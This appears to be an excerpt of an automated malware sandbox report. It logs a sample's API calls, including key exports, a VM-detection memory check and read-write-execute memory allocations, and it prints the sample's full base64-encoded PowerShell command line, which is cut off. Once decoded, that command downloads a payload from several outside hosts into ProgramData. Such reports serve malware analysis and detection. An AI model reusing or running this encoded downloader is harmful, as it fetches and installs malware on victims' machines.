CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ca68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ca68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ca68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042ca68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 23, 2023, 9:37 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 135 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x742d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 1310720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02880000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0206a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02062000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02682000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02981000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02982000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02683000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02684000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0206b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02685000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02686000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05130000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05131000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05132000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05133000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05134000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05135000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05136000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05137000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05138000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05139000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05140000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05141000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05142000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05143000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABtAG8AYQBiAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBRAEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABjAEEATABnAEEAMABBAEQATQBBAE8AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABJAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAGcAQQB5AEEARABFAEEATQBRAEEAPQAiADsAJABjAGgAbwBsAG8AaQBkAGkAbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAFEAQQBMAGcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBNAFEAQQA0AEEAQQA9AD0AZQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAGcAQQBOAGcAQQA9AGUASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAEEAQQB1AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AUQBBAHoAQQBEAFUAQQBMAGcAQQA1AEEARABVAEEAZQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBRAEEANABBAEQARQBBAEwAZwBBADMAQQBEAFUAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAxADsAJABwAGUAYwBrAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYwBnAEIAaABBAEgAYwBBAFkAZwBCAGwAQQBHADQAQQBZAHcAQgBvAEEARQBZAEEAYwBnAEIAaABBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBMAGcAQgB0AEEASABVAEEARgA9AE0ARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB5AEEARABNAEEATgBBAEEAPQBGAD0ATQBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQAyAEEARABBAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBNAHcAQQA1AEEAQQA9AD0AIgA7ACQAcgBvAG0AYQBuAGkAegBlAHIAQQBzAHAAcgBlAGQAaQBuAGkAZABhAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBHAHcAQQBaAFEAQgAxAEEASABJAEEAYgB3AEIAMABBAEcAOABBAGIAUQBCADUAQQBGAFkAQQBkAFEAQgBzAEEARwBNAEEAWQBRAEIAdQBBAEcAawBBAGMAdwBCAGwAQQBHAFEAQQBMAGcAQgB1AEEARwB3AEEAIgA7ACQASQBuAGMAbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAFkAdwBCADAAQQBIAFUAQQBiAHcAQgB6AEEARwBVAEEATABnAEIAbABBAEcARQBBAGMAZwBCADAAQQBHAGcAQQBzAEUAYgBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABnAEEATABnAEEANQBBAEQAZwBBAEwAZwBBADMAQQBEAEkAQQAiADsAJABoAGkAcABwAHUAcgBpAHMARQB4AGMAdQBzAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAUgBBAEIAMABBAEgATQBBAFYAQQBBADQAQQBIAGcAQQBkAEEAQQA9AGQAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATgB3AEEANQBBAEMAOABBAFUAQQBCAHMAQQBFAHcAQQBOAEEAQgB0AEEARgBVAEEATAB3AEEAdwBBAEUAMABBAFkAZwBBAHcAQQBGAGcAQQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBRAEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAEUAQQBNAHcAQQB2AEEARQBZAEEAYwB3AEEANABBAEYAQQBBAGUAUQBBAHYAQQBGAEkAQQBaAFEAQgA1AEEARABBAEEAUgB3AEIAaABBAEYATQBBAFcAZwBBADIAQQBGAE0AQQBWAEEAQgB5AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAaABhAGsAYQBmAG8AdABoAEwAbwBwAHAAZQByACAAaQBuACAAJABoAGkAcABwAHUAcgBpAHMARQB4AGMAdQBzAGUAcgBzACAALQBzAHAAbABpAHQAIAAiAGQAIgApACAAewAkAFAAbABhAG4AbwByAGIAbwBpAGQAUwB0AHIAeQBwAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAegBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBBAEEAPQBuAGoAbwBVAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAWQBBAEwAZwBBADQAQQBEAEEAQQBMAGcAQQB5AEEARABNAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBBAD0APQBuAGoAbwBVAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAGMAQQBOAFEAQQB1AEEARABJAEEATQBnAEEAegBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBuAGoAbwBVAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAyAEEARABZAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBOAGcAQQA9ACIAOwB0AHIAeQAgAHsAJABpAG4AYwBhAHIAYwBlAHIAYQB0AGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEANABBAEQARQBBAEwAZwBBAHgAQQBEAEUAQQBOAFEAQQA9AHQAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAdwBBAEQAUQBBAEwAZwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABRAEEATQBRAEEAPQAiADsAJABVAG4AZABpAHYAZQByAHQAaQBiAGwAeQBGAGkAYgByAG8AdgBhAHMAYwB1AGwAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABNAEEATQBnAEEAdQBBAEQARQBBAE8AQQBBADQAQQBDADQAQQBNAFEAQQB5AEEARABFAEEATABnAEEAeABBAEQAawBBAE4AdwBBAD0ARQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQATQBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQAVQBBAE8AQQBBAD0ARQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgAWQBBAFoAUQBCAHkAQQBHAGsAQQBiAGcAQgB6AEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGoAQQBHAGsAQQBaAFEAQgB6AEEARQAwAEEAZABRAEIAeQBBAEgAQQBBAGEAQQBCADUAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAYgBBAEIAdgBBAEcARQBBAGIAZwBBAD0ARQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHcAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAYwBBAEwAZwBBADAAQQBEAFUAQQAiADsAJABDAHIAYQBjAGsAdQBwACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYQBRAEIAagBBAEcAcwBBAFoAUQBCADAAQQBIAE0AQQBRAFEAQgBpAEEARwBJAEEAYgB3AEIANgBBAEgAbwBBAGIAdwBBAHUAQQBIAGsAQQBiAHcAQgBuAEEARwBFAEEAaABhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGQAUQBCAHoAQQBIAEEAQQBhAFEAQgBrAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCADUAQQBBAD0APQBoAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBvAEEASABrAEEAYwBBAEIAdgBBAEgAUQBBAGMAZwBCAHYAQQBIAEEAQQBhAEEAQgBwAEEARwBNAEEATABnAEIAbgBBAEgASQBBAGIAdwBCADEAQQBIAEEAQQAiADsAJABQAGkAZQByAGkAZABHAGUAbgB1AGYAbABlAHgAaQBvAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaABhAGsAYQBmAG8AdABoAEwAbwBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAFAAaQBlAHIAaQBkAEcAZQBuAHUAZgBsAGUAeABpAG8AbgAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABuAG8AbgBpAG4AdABlAGwAbABpAGcAZQBuAGMAZQAuAE4AbwBuAGEAYwBpAGQAOwAkAEUAcwBjAG8AcABlAHQAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEcAVQBBAGIAQQBCAGgAQQBHADQAQQBiAHcAQgB3AEEARwB3AEEAWQBRAEIAcgBBAEcAawBBAFkAUQBCAEUAQQBHAGsAQQBjAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEcAYwBBAGMAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAYQBRAEIAegBBAEgAUQBBAEwAZwBCAGgAQQBHAGMAQQBaAFEAQgB1AEEARwBNAEEAZQBRAEEAPQA9AGEAQ